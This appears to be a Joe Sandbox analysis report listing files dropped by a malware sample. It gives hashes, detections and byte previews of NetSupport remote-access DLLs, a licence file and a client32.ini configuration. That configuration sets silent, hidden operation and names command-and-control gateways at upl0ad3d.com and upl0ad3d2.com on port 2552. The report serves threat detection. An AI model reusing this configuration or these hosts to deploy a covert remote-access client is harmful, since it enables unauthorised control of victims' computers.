                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Players

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):947314
                                                                                                                        Entropy (8bit):6.630207537444939
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:iyL1NdEcgjRnuWbIv216yoEGGPve5KIHbaCB+m:imBrQRFbIcaGPml7aCx
                                                                                                                        MD5:0C1D2B8F2A9E41813C18CFE02B24AFBE
                                                                                                                        SHA1:7334DD4D77D8E0BE48A142E12084E7085D21638D
                                                                                                                        SHA-256:CD1838887F90DE086E13F154FC6CAD7683328CD5524023F4B45FAF3CEB2FF10A
                                                                                                                        SHA-512:A1B40AF96B5BC4C649D5E4F79127431C0F8B28199FC23273BE152AF63681617136093898C18D2224189F722CB2C7ECC6E65340C24E4A7978A7EDC398F4E0FA9F
                                                                                                                        Malicious:false
                                                                                                                        Preview:cruzVehicleRespectiveDiane........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L....q.b.........."...............................@..................................i....@...@.......@.........................|....P..P............N..X&...0..hv...........................C..........@............................................text.............................. ..`.rdata..............................@..@.data...tp.......H..................@....rsrc...P....P......................@..@.reloc..hv...0...x..................@..B......................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Reception (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):133120
                                                                                                                        Entropy (8bit):6.626963923213231
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:jdv+Z/2UDjpNvatQaw10UZhO6EZZyvs6Df9xris9kMmZiO:jdv+Z/fDldZhO6wyvs6RBis9kMU
                                                                                                                        MD5:6393C306F3BDC74E0639F41E3FF27C52
                                                                                                                        SHA1:5D6B3E68C43F8D4562EEB8D6752C81FCB05F5F3D
                                                                                                                        SHA-256:91177517545989425F711D8AA64752DF35998EA2642453373FCB2809B82433DB
                                                                                                                        SHA-512:44AC619FBDAACA305AD0A493438F70137E8BF38F6E5D410575D5BF65E8349B9E0F8546C47E1D8C48FF3834C6F35D9A05EEB00F03730509F600337D810673D5DD
                                                                                                                        Malicious:false
                                                                                                                        Preview:....b...6.^2...}.Y.E..}..t.;.tB.M..E.PW.....j..u..u..v..6.......t..E.Wj.h.....0..H.I.....t..E.C.M......._^[....U..SVj...j.h.....6..H.I....u.2....M.h..I..0P..Q.u..u.Sj.j.h.....6..H.I.P...a...^[]...U..QV..M.h..I...O...u..........u.2....u...P.....^Y]...U......SV...X...W......3j(......3..X.....h.........M...j(V.E.M.P..X....E......E......}..z...Vj.h>....3..H.I.....X...h......X...PW.......t.....X........I.3.M.P.)O....X....<..._^..[....U..V.u....+.....t.h....Ph'....6..H.I....H^]...U..QSW.u...........t(Sj.h.....7..H.I.Sj.h.....7..H.I...t.....2._[Y]...U..QV3.W.....u..E.Ph....j.VVVW..X.I...t.j...VVW..h.I.P....I.P..l.I._^..W..Q..;.t.P....I...u._.3.@_.U..S.].VW.}.9...*....u...h..I...N.....E.Q......j:Y...f;.t1j;Yf;.t)j]Yf;.t!..;.w..A.Q.M............P..u.....I....n..............h....v..6....I..7.M.V.L...j:Z...f;.t.j;Yf;.t.j]Yf;.......f;.u..F....M.h..I..jM...D.M.V......M.....E..F.P.E.......M.j;Z...f;.u.f;.u.......u.Q.M..7.-u...7;.v...F.7.M.V......... t...t....2._^[]...U.......SW..

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Sbjct (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):50176
                                                                                                                        Entropy (8bit):6.580938414966878
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:8BZVuB/VqwUUyK3TGcAcVUB5Cn6deYTCRv6Dj7QPAx3xv6llEAoi:8BE/VDKC7YORv+j6+3xtAr
                                                                                                                        MD5:C7228ABD722E71E6B51318AF66AFD1BB
                                                                                                                        SHA1:2F017C9479A5C5CEB2AD78EE890B6C9842970B96
                                                                                                                        SHA-256:135755FB74460EA4117B4032603BC8AB153B33A5D6677887956E987140C3DBD5
                                                                                                                        SHA-512:47C0C53E17B554A55B16FED2C5E6386B9D3CF4DC6D2A7A16CA6A5676CE309EE9CA253A15C14026DEFB778AC00B41649B14E62ADA291DFF95BA0DDDF1B607CA28
                                                                                                                        Malicious:false
                                                                                                                        Preview:}.9E...................}.............Q*...$...E.;M........F|.E.;........V...t..u.N.QP............t4......N..U...+.;.w f..f;F4u..........f.G.f;F6.............t1.G.;F|r).~..u#.~..u.f..f;F4u..Fh..............)...F|....}..E.;.s.f.......f#......f;..E.u.....}..M.A.M.;M.../....%.......t.;.....v..Fh.............z)...U..}....O...;...`....E...@..P.u.V.u..u.................f.G..........}.f#......f;.u.....}...}...E.u.;.v.f.?.u.f....u..y..}.;.w.......E.=....}N;...j....N|.E.;.sB....}.;.s$f...E.....f#E..E.....f;E.E.u.....}.@.E.;E.|..$....~|.}..............;............Fh..................c(..)M.N|..+...9E.v7..........}.......;............Fh...................(...E.<G.}.....;M........F|;...Z.............%....=....u...G.......%......................u..F|....}.;...4...f.?.uC....;...t0.~l..........t!...t.......t...( ..t...) .........F|.<W.}..M.A.M.;M...T........;M............;~|...........%....=....u...G.......%.........................wTt.......w@t....t... uj......u.3..}.....;...X....E.<W@.}

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Seminars (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):160882
                                                                                                                        Entropy (8bit):5.966232770435887
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:K6lLxjgarB/YaCDWy4ZNozSqzvvc0f/Y/P0z:K6/garZkaBZ2zSq8Uz
                                                                                                                        MD5:EC94F6C7132A0E8FE98300F75634786C
                                                                                                                        SHA1:04BD5AA9B4D011D960D7288251D8D2719BFB1336
                                                                                                                        SHA-256:985CBC7FA88E97FBAD57BDBFC6F62320D945CE778B3C5F5566577E042CCFDD37
                                                                                                                        SHA-512:EF18FA4B22367745FD584BF7DE5EC5B7A815EEF920328667CCF40E38D47499B315A8532D11B88F3060219E76B4C2D810D55E3E8C23A499F73D62D8643089A7C6
                                                                                                                        Malicious:false
                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\fhenve3c.gto\Speaking (copy)

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):140288
                                                                                                                        Entropy (8bit):6.711770545676298
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:Y7z835PzpOXeFIqvhGGsC4c83/nOJUDylSgpRuDJXG:Y7w3hpOXeio1L8/8L8gnuDJXG
                                                                                                                        MD5:96B7B9D3FCAC304F1F4BE0931C1A5B83
                                                                                                                        SHA1:E8C273C12FADD1277E5F5C5C8FB0F03C84449995
                                                                                                                        SHA-256:7C53943B69FEF395214474DED7856F2DD10D71D2DC84FA44B5A7795539793955
                                                                                                                        SHA-512:98DDACD637EE3A55A95D263AADA70ECD3BC130B28FFE234F7611B6CC1E94A3BE9AA67842DF242ACF175DDC65A1280FBF47B8D6A57A54B13B511904DB82B0BD82
                                                                                                                        Malicious:false
                                                                                                                        Preview:u....F....F.....^]...U....SVW.}...3.j.A.G.[.M..@.f9X...b......e....d....;.........m.....h.............:.t...uY..:.t...uS..:.........uI..]...;Z.~L..u>..;Z..A.U.B.U...u1.M...d....@...;...T..._^[.....P0.P0.P0.P0.@0..j.h.....F...U..Q...SVW.13.....M.x>..>.+....S..s...0.u....YY..x.~..{..M.;.~.;....._^[.....s.......V..~..t..~..Wu..~.........F.._.N.^.N..y...t.Q......~..F....V....(..j.V..C..YY..^...U..V..W.F...........}.S..........j.[9_...@..........@.......[.N.....@..._..^]...U..QSVW...G...................u?.u..~....[...j.Y9N..........6.........../...O..........._^[.......................M...U..QQV..~..t........]...'...E....F.....^..U....SVW..M.h..I..)....u..F....x........j8.B......$.....'...B..Y..G.....O..=.........F..0.......v....l..........PV.G(.Z.......R.......................G(........E..x...........>.....U.+w...u......V.........M.....E...P.E.P.W............M..E.P......j..u..H....&....M......E..@....x..u........t.Q...p..._^3.[....U..A,...t<...t7..

                                                                                                                        C:\Users\user\AppData\Local\Temp\rrrr.exe

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1352627835
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:
                                                                                                                        MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                        SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                        SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                        SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                        Malicious:false
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: ss-kids.apk, Detection: malicious, Browse
                                                                                                                        • Filename: bet365_Sports_Betting_v8.0.2.305-us_www.9apps.com_.apk, Detection: malicious, Browse
                                                                                                                        • Filename: .apk, Detection: malicious, Browse
                                                                                                                        • Filename: XX7TX56y61.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ss-kids.apk, Detection: malicious, Browse
                                                                                                                        • Filename: kurulum.apk, Detection: malicious, Browse
                                                                                                                        • Filename: APT-C-23, Detection: malicious, Browse
                                                                                                                        • Filename: Gg13vDczsm.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Gg13vDczsm.exe, Detection: malicious, Browse
                                                                                                                        • Filename: .apk, Detection: malicious, Browse
                                                                                                                        • Filename: .apk, Detection: malicious, Browse
                                                                                                                        • Filename: app.apk, Detection: malicious, Browse
                                                                                                                        • Filename: Servizio Pubblico_co.mosai.mondonuovo_1.0.0_base.apk, Detection: malicious, Browse
                                                                                                                        • Filename: Speedy_Services_v5.0.12_www.9apps.com_.apk, Detection: malicious, Browse
                                                                                                                        • Filename: cqe4Tj8Pgb.exe, Detection: malicious, Browse
                                                                                                                        • Filename: SecuriteInfo.com.Trojan.GenericKD.65537617.16965.5294.exe, Detection: malicious, Browse
                                                                                                                        • Filename: SecuriteInfo.com.Trojan.GenericKD.65537617.16965.5294.exe, Detection: malicious, Browse
                                                                                                                        • Filename: .apk, Detection: malicious, Browse
                                                                                                                        • Filename: 5NYUKHPofP.apk, Detection: malicious, Browse
                                                                                                                        • Filename: aplicativo.apk, Detection: malicious, Browse
                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................FLSKEYTDUILWQAQYYCPFJCZJYBUYQZADQCWUJPBTIMFSWWJYBZTGONLSSCUTDCNZ............................................{...PE..L....^B*.................J..........XX.......`....@..........................0...................@..............................8................................!..................................................................................CODE....|H.......J.................. ..`DATA.........`... ...N..............@...BSS..................n...................idata..8............n..............@....tls.....................................rdata..............................@..P.reloc...!......."..................@..P.rsrc............0..................@..P............. ......................@..P........................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\AudioCapture.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):93560
                                                                                                                        Entropy (8bit):6.5461580255883876
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                                        MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                                        SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                                        SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                                        SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                                        Malicious:false
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\AudioCapture.dll, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@*..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\HTCTL32.DLL

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):328056
                                                                                                                        Entropy (8bit):6.7547459359511395
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                                                                        MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                                                                        SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                                                                        SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                                                                        SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                                                                        Malicious:false
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\HTCTL32.DLL, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\NSM.LIC

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):258
                                                                                                                        Entropy (8bit):5.1458289587885675
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:O/oPDvXk4xRPjwx3LzX81DKHMoEEjLgpW2MorGLUfKdYpPM/ioxTKa8l6i7s:X7XZR7wx3LzXBJjjqW2M23KKPM/iox7X
                                                                                                                        MD5:1B41E64C60CA9DFADEB063CD822AB089
                                                                                                                        SHA1:ABFCD51BB120A7EAE5BBD9A99624E4ABE0C9139D
                                                                                                                        SHA-256:F4E2F28169E0C88B2551B6F1D63F8BA513FEB15BEACC43A82F626B93D673F56D
                                                                                                                        SHA-512:C97E0EABEA62302A4CFEF974AC309F3498505DD055BA74133EE2462E215B3EBC5C647E11BCBAC1246B9F750B5D09240CA08A6B617A7007F2FA955F6B6DD7FEE4
                                                                                                                        Malicious:false
                                                                                                                        Preview:1200..0xa353ff01....; NetSupport License File...; Generated on 14:45 - 17/07/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=HANEYMANEY..maxslaves=8888..os2=1..product=10..serial_no=NSM385736..shrink_wrap=0..transport=0..

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICHEK.DLL

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):18808
                                                                                                                        Entropy (8bit):6.292094060787929
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                                                                        MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                                                                        SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                                                                        SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                                                                        SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                                                                        Malicious:false
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICHEK.DLL, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICL32.DLL

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3740024
                                                                                                                        Entropy (8bit):6.527276298837004
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                                                                        MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                                                                        SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                                                                        SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                                                                        SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                                                                        Malicious:false
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICL32.DLL, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICL32.DLL, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 7%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\TCCTL32.DLL

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):396664
                                                                                                                        Entropy (8bit):6.80911343409989
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                                                                        MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                                                                        SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                                                                        SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                                                                        SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                                                                        Malicious:false
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\TCCTL32.DLL, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 7%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):106864
                                                                                                                        Entropy (8bit):4.727278573880877
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:qWhNuV5+6j6Qa86Fkv2Wr120hZhvntVXZWytVm4Fihj:q2oVZl6FhWr80/hvntVXcytVTit
                                                                                                                        MD5:2286E6E9C894051C0E4A856B42AD7DCD
                                                                                                                        SHA1:A506DDA9ED2BEBA776FB9E6E61EB7E1F757ECDEF
                                                                                                                        SHA-256:A16DACBAB60CA49DE99D2E5617A189DCB4B699577F6D66F1CCCD96689DE6947D
                                                                                                                        SHA-512:1AFEAC4F81879945BFC055D2303169E96A2A2C7E927F59BE274997B059A1BC110175A24337CE05E9BC6E3E7FA80A1F799C4E71A4A43994AF003B6DB4C9E73BAD
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 23%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...y.(Y.....................r...... ........ ....@.......................................@.................................< ..<....0...l...........x..p).......... ............................................... ...............................text............................... ..`.rdata..^.... ......................@..@.rsrc....l...0...n..................@..@.reloc..l............v..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.ini

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):911
                                                                                                                        Entropy (8bit):5.3068432268236085
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:0kx/vONhz7q+mPXjxGSGpzWVTXuZ7/PfY837GXoKIDWUpYL7XBGSaCYublu3wAtj:0kpOhzZmPTxapz1l1yXtIDJCPBmu+9d
                                                                                                                        MD5:7D150265BDA456242F0E05CAC841288C
                                                                                                                        SHA1:0A7D96A906CF66227B23CC29C4C4192595729203
                                                                                                                        SHA-256:72058624822F930DDC80862E00BCADE41861BC0347ADA76271753D2892322E5C
                                                                                                                        SHA-512:3DBDDAB1437678EED938A3B2F35B4AEF400BD612C83566284B0F299F5C9696AA9B0D0E1135BDF2423A2B39BECBDEFF051E24B4B1E8D70C90DF4B7DE68A7D06E8
                                                                                                                        Malicious:false
                                                                                                                        Preview:0xb44d8e54....[Client].._present=1..AlwaysOnTop=0..AutoICFConfig=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=1..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=1..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RoomSpec=Eval..Shared=1..silent=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=0..Usernames=*..ValidAddresses.TCP=*....[_Info]..Filename=C:\Program Files\NetSupport\NetSupport Manager\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1..Threshold=48....[Bridge]..LoadOnStartup=1..Modem=PPTP..PasswordFile=C:\Program Files\NetSupport\NetSupport Manager\bridge.psw..Protocol=0....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=upl0ad3d.com:2552..GSK=GF<MABEF9G?ABBEDHG:H..Port=2552..SecondaryGateway=upl0ad3d2.com:2552..SecondaryPort=2552..

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\msvcr100.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):773968
                                                                                                                        Entropy (8bit):6.901559811406837
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                        MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                        SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                        SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                        SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\nh.zip

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2265919
                                                                                                                        Entropy (8bit):7.9973398491864245
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:49152:C1ZlDlEDThXBJOhHDn6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqR0ZkTS6A:C1qFXaRhRFY89YYc9jh23redpmQRNA
